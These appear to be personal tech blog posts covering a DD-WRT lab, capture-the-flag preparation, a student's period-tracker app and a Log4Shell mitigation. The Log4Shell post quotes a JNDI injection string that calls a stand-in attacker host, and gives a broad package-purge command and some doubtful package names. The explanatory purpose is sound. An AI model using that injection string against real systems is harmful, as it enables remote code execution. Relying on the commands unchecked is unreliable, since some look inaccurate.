Even if I wanted to stick with Windows as one of the endpoints, I probably should've gone with Windows Server to test it, but I'll hide under the guise of "this is how I'm going to deploy it in my production environment, so it was a good thing I used Windows 11."

I've also learned that DD-WRT is extremely unstable in x86 virtual machines. It's unclear if it would fare any better on physical hardware, as I currently don't have the time or space to test that, but if I had to hazard a guess, it probably wouldn't. I did also use the "public" image, which has limitations compared to the "full" image, the most notable of which is a vastly reduced number of connections. That may have played a part in some of the issues I had, but it goes without saying at this point that DD-WRT, in its current state, is not designed for x86 hardware. If you are looking to build your own router using x86 hardware, you might want to look at pfSense or OPNsense instead. I could've also simulated this using Cisco Packet Tracer, and while I would've been able to take away a few things from it, it likely wouldn't have been as representative of deploying it in my current environment.

---

# My First Capture The Flag

https://www.monicarose.tech/2022/10/guidepoint-security-2022-capture-the-flag/

On October 27th at 7 AM CDT, GuidePoint Security opened their 2022 Capture the Flag. This also happens to be the first Capture the Flag that I have ever participated in. As of me writing this blog post, I have yet to start, as the CTF hasn't begun. Prior to starting the event, I opted to get some tools set up in advance:

- VMWare Workstation 16
- Kali Linux
- Sublime Text & Visual Studio Code
- Working OpenVPN install
- ILSpy
- gobuster & dirbuster
- nmap
- nikto

Additionally, I have set up the following resources to be easily accessible:

- rockyou.txt for password evaluation
- directory-list-2.3-medium.txt for website directory evaluation

I also opted to enable NAT networking to be able to easily access resources on the virtual machine from my laptop, as I strongly believe it is important to have different working environments during the day, especially when working on a large project. Furthermore, my Kali Linux virtual machine is being mirrored to my Proxmox server at my house to ensure I have a working and stable environment.

Please check back often, as I will be updating this as the CTF progresses. No write-ups will be provided until after the CTF has concluded.

---
# Programming as a Student

https://www.monicarose.tech/2022/08/programming-as-a-student/

Programming can be an absolutely time-consuming process, especially when you're doing it while being a full-time student and working a part-time job. So how do I manage that?

## The Timeline

A lot of the projects that I work on are small, relatively simple, and sporadic. Looking at my GitHub, you'll notice that I'll commit to a project for a few days, then switch to a different one altogether. Sometimes new projects will take up to 6 months to get started, and I seldom return to the old ones. This is, unfortunately, one of the consequences of being a student and taking up programming as a hobby. In fact, it wasn't until the story broke that Flo had been caught selling users' data to companies that I found the inspiration to start building my own period tracking app.

## Starting the Project

While I have data that goes back as early as May 9th, 2022, I started theorizing this project as early as late April of that year. I realized that, being a transgender woman, I had never needed to use a period tracking app and didn't know what was wanted in one. As such, the most responsible way I could think of to get accurate data was to ask my peers to take a survey. Questions covered what period tracking app they currently use, what they liked and didn't like, what features they wanted integrated, and things that may have affected a cycle, since not everyone has consistent cycles. It was this data that I used to start the project.

## Hello World

Starting a new programming project has always felt the same way for me: the excitement of starting something new, followed by wondering what I got myself into five minutes later. But with this one, there was a third feeling: the excitement of being able to make a significant change in someone's life. Under the code name foss-period-tracker¹, I opened up my IDE² of choice and began building a proof of concept for a period tracking app. It didn't need to be fancy for a proof of concept, nor did it need to be perfect. But it needed to have some sort of functionality. I built my own date format class³ to be able to translate Strings into dates and vice versa. After prototyping something, I created a repository on GitHub and ran some terminal commands:

```sh
git add .
git commit -m "Initial Commit"
git push git@github.com:/TotallyMonica/foss-period-tracker
```

Sure enough, my first commit was done. But this time, I knew I wasn't done. I knew that this proof of concept was just that: a proof of concept.

## Time Management

As this project started, I ran head-first into a major hurdle. Finals were just about to start, and I needed to study. While, yes, I could've studied by working on this since I was taking a programming class, I determined it wasn't worth the time, effort, headache, and the likelihood that I'd get too focused on the project to study for my other classes. So just as quickly as it came, my interest in continuing the project left me. I didn't start working on it again until July 2022, when I took a road trip down to Mammoth Cave and continued working on it. I tethered my laptop to my phone's hotspot and got a ton done on the drive down. One of my friends noticed the repository and how much I was committing to the project and pitched in where she could. However, when I got to where I was staying for the vacation, I put my laptop away and forgot about it again. In late July, I picked the project up once more and made some leaps and strides with one of my major hurdles, which was actually debugging some of my classes.

## Debugging

I wouldn't be shocked if a majority of programming time is spent debugging, which is where the head-banging kicks in. And with the debugging comes the pain of having ADHD. Since I have ADHD, I tend to get sidetracked easily. So when I have a project that keeps telling me that 10+20=1020, suddenly it becomes very appealing to step aside for a while.
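For anyone who hasn't hit it, 10+20=1020 is the classic symptom of string concatenation sneaking in where you meant integer addition. A minimal Java illustration of the trap (not my actual code, just the shape of the bug):

```java
public class ConcatBug {
    public static void main(String[] args) {
        String day = "10";  // values parsed from text tend to arrive as Strings
        int offset = 20;

        // '+' with a String operand concatenates, so this prints 1020:
        System.out.println(day + offset);

        // Parse first to get the arithmetic you meant; this prints 30:
        System.out.println(Integer.parseInt(day) + offset);
    }
}
```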
My first proper prototype was built on August 4th, 2022, when I was able to successfully define that I had a consistent period that took place every 28 days and lasted 4 days, acting as if I had just gotten off of my period. While there's more to go from there, the first major debugging obstacle was taken care of. Right before this first major prototype was built, I had been admitted to Southeast Missouri State University, and I had been scampering around getting everything sorted out. Clearing this obstacle made it clear to me that, while not perfect, I was on the right path to making something good.

## Definitions

FOSS¹: Free and Open Source Software. Free, in this context, doesn't necessarily mean $0, but rather free as in freedom.

IDE²: Integrated Development Environment. While my IDE of choice for this project is Eclipse, there are many IDEs in the world, notably Visual Studio Code, Atom, and Sublime Text.

Class³: A blueprint/template for a data type. Sort of think of it as a program within your program.

This article is still being written. Come back at a future date when there are more updates.

---

# Log4Shell: My damage mitigation strategy

https://www.monicarose.tech/2022/02/log4shell-my-damage-mitigation-strategy/

On December 10, 2021, a vulnerability within the Log4j 2 library was disclosed. Due to how widespread Log4j 2 is, I had to mitigate the damage as quickly and efficiently as possible.

## What is Log4j?

Log4j is a Java library used for logging actions taken within a program. These actions can include error messages, user input, responses, and warnings, and the logs are often used to figure out what caused a given issue or to determine how to optimize a program. In fact, there's a good chance that you have used a logging library like Log4j before, whether you realized it or not. Due to the nature of Java and Log4j, modifications to the code for your use case are often encouraged. Such modifications, or forks, can include the ability to parse links, anonymize users, enable compatibility, and back up logs.

Log4j 2 specifically is a successor to Log4j that includes patches for vulnerabilities, performance improvements, better API support, and filtering, just to name a few. Because it is based on Log4j, Log4j 2 is meant to be a drop-in replacement for its predecessor with little to no additional work on the programmer's end.
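The vulnerability itself, CVE-2021-44228 or "Log4Shell", abused Log4j 2's lookup feature: on affected versions (before 2.15.0), logging attacker-controlled text could trigger a JNDI lookup and remote class loading. A sketch of the kind of innocent-looking code that made so many applications exploitable (the class and input here are illustrative):

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginHandler {
    private static final Logger LOG = LogManager.getLogger(LoginHandler.class);

    public void onLogin(String username) {
        // On vulnerable versions, a username like
        //   ${jndi:ldap://attacker.example/a}
        // was evaluated as a lookup rather than logged literally,
        // letting an attacker's LDAP server hand back code to run.
        LOG.info("Login attempt for user {}", username);
    }
}
```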
## Step 0 - Determining Potential Roadblocks

The main issue with attempting to mitigate these types of issues is how Java and, by extension, Log4j are deployed. Most modern-day deployments of Java are done in a manner beyond our control, often compiled into executables that your operating system can understand without installing dependencies. While irrelevant to my workflows, Ubiquiti's controller software, IPMI for various computers, and even car stereos are based on Java, as examples. Due to their closed nature, the best that I can do is update what I can and pray that the vulnerability has been taken care of. Ubiquiti actually made the update known and made that exploit fix one of, if not the, first line in the changelog.

What I can control, however, is what software I use, and I can patch the issue in any open source programs I run. That being said, all of my outside-facing servers have automatic updates set up and configured with a set-it-and-forget-it mindset. While severe issues such as this one necessitate checking manually, it serves well for the occasional performance update, less severe security issues, and generalized bug fixes. The main things I was concerned about were programs that I hadn't used in extended periods of time.
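One thing worth adding for anyone retracing these steps: Java applications frequently bundle Log4j inside their own directories, where no package manager will report it, so a filesystem sweep is a useful complement. Something like:

```sh
# Find bundled copies of Log4j 2 that package managers won't report.
# Anything below 2.17.1 (or 2.12.4/2.3.2 on the older branches) needed patching.
find / -name 'log4j-core-*.jar' 2>/dev/null
```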
## Step 1 - Removing Java

The computers and servers that I kept a keen eye on were the following, with some obfuscation put in place for privacy concerns:

- My desktop running Fedora Linux 35, KDE Plasma spin
- My laptop from Framework running Windows 11
- TrueNAS Scale beta server, based on Debian 10 Buster
- Proxmox 7.4 server, based on Debian 11 Bullseye
- Raspberry Pi running Raspberry Pi OS Bullseye 64-bit, serving as a remote backup server
- Ubuntu Server 20.04 on a Linode server that's used as a project server
- The server running this website, using WordPress on a Linode server

Furthermore, I had various client computers and servers I needed to get upgraded immediately, but due to privacy concerns I'm electing not to share their hardware and software setups.

Because most of my hardware had at one point used Java, I first needed to check whether Java was installed and, if it was, determine what version it was.

```sh
$ java -version
```

This revealed a lot of information. Where I had Java installed, the version in use was most of the time a relatively recent patch of 1.8. Ideally, I should've been running 17 regardless. For my Linux-based hardware, I needed to remove any variant of Java potentially installed.

```sh
# apt-get purge *java*
# dnf remove *java*
```

As for Windows, I simply opened up Settings -> Apps, searched for Java, and uninstalled anything that came up. Furthermore, I made sure I had the latest versions of Visual Studio Code and Eclipse installed because, even though they use the development kit of whatever language you want to work in, I didn't want to take any chances.

## Step 2: Forcing Updates to be Installed

For programs where I was unsure what language they were written in, I forced updates to be checked on everything. I've been using winget on Windows since it was first announced as a first-party package manager for Windows. While it's still flawed to this day, it covers well over 90% of the programs that I use.

```powershell
PS C:\Windows\System32> winget update --all
```

Winget was able to update most of the programs that needed to be updated. For the ones that weren't covered, I went and manually installed the latest versions. Linux machines, on the other hand, were significantly easier to update due to the nature of how programs are installed.

```sh
# apt-get update
# apt-get upgrade -y
# dnf update -y
```

I ran apt-get on Debian- and Ubuntu-based servers and dnf on Fedora systems to make sure I was fully updated.

## Step 3: Installing Java

Due to the nature of the issue, I repeatedly checked for updates over the span of a week, as multiple variants of the issue came up after the root bug was discovered. By about late December, I had decided that I was updated enough. On the machines that had previously had Java and were known to need it, I installed the latest Java 17 JDK to ensure I had the least bug-prone version.

```sh
# apt-get install java-jdk-latest
# dnf install java-openjdk-latest
```

As far as Windows is concerned, I ended up going to Oracle's website and downloading the latest version of the Java 17 JDK.

## What Took So Long?

This has been sitting in my drafts since the issue was discovered; I even started writing it as I was taking care of the security issues. It led to a philosophical question: is security through obscurity good security, or does it mask bad security? Ultimately, I decided that it can be a good measure, but more often than not it shows that you're not confident in your security measures. I also publish all of my work to GitHub, so for me to not have my efforts publicized and available to others would show a lack of confidence in them. Furthermore, another question came up: was my mitigation effective? Or did I uninstall and reinstall Java for no reason? Aside from the peace of mind, I have noticed that several of the programs I use regularly had Log4j patches pushed, including the core Java runtime itself.

## Conclusion

I learned from this that it can be easy to become complacent with your updates, especially with zero-day vulnerabilities like this one. Furthermore, this tested my remote management skills, ensuring I was still able to connect to my machines regardless of where I was.